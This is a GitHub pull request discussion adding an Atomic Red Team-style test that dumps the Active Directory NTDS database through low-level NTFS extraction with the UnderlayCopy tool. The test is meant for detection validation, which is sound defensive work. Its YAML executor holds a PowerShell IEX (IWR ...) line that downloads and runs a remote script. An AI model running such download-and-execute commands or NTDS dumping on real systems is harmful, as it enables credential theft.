Update T1003.003.md & T1003.003.yaml via UnderlayCopy #3217
Conversation
|
Thank you for this PR @kfallahi- Can you please add screenshots of the execution and cleanup of this atomic via Invoke ? hat will be of huge help for review Also no need to add the .md files next time , these are automatically generated from the yaml files |
atomics/T1003.003/T1003.003.yaml
Outdated
| executor: | ||
| command: | | ||
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | ||
| IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing) |
There was a problem hiding this comment.
Hey @kfallahi Thanks for your contribution. Instead of refs/heads/main can you tag it to a particular commit ID like
https://github.com/kfallahi/UnderlayCopy/blob/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1 ?
There was a problem hiding this comment.
If you could also move this URL to an input argument, it would be great :)
There was a problem hiding this comment.
Thanks! I’ve updated it to reference a specific commit ID and moved the URL to an input argument. Please let me know if anything else is needed.
4 participants
This PR adds an atomic test that demonstrates NTDS Dumping via raw NTFS extraction using UnderlayCopy.
UnderlayCopy extracts protected/locked system artifacts (SAM, SYSTEM, NTDS) by parsing $MFT and/or mapping clusters via filesystem metadata. This atomic helps validate detections for raw-volume and MFT-based acquisition techniques.
Atomic: Copy NTDS in low level NTFS acquisition (MFT and fsutil method)
ATT&CK mapping: T1003.003
Executor: powershell
References: https://github.com/kfallahi/UnderlayCopy
I can add additional atomics for SAM and SYSTEM (mapped to T1003.002) if maintainers prefer.